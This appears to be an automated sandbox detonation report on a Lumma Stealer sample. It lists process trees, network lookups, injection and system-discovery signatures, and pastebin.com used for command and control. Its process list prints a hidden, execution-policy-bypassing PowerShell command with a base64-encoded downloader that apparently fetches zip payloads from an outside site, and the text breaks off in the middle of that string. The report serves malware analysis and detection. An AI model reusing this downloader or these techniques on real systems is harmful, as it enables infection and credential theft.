"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5400,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5548,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5560 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5584,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6040,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5744,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5912 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 92.123.241.137:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| GB | 2.19.117.71:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 137.241.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgestatic.azureedge.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| GB | 92.123.128.149:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 149.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| GB | 92.123.128.149:443 | www.bing.com | tcp |
Files
Analysis: behavioral13
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
8s
Max time network
20s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2416 wrote to memory of 2236 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
122s
Max time network
124s
Command Line
Signatures
Lumma Stealer, LummaC
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1176 set thread context of 2420 | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | C:\Windows\SysWOW64\cmd.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"
C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
"C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 866
C:\Windows\SysWOW64\wbem\WMIC.exe
C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
C:\Windows\SysWOW64\more.com
C:\Windows\System32\more.com
C:\Windows\SysWOW64\cmd.exe
C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
C:\Windows\SysWOW64\chcp.com
C:\Windows\System32\chcp.com 65001
C:\Windows\system32\reg.exe
C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QU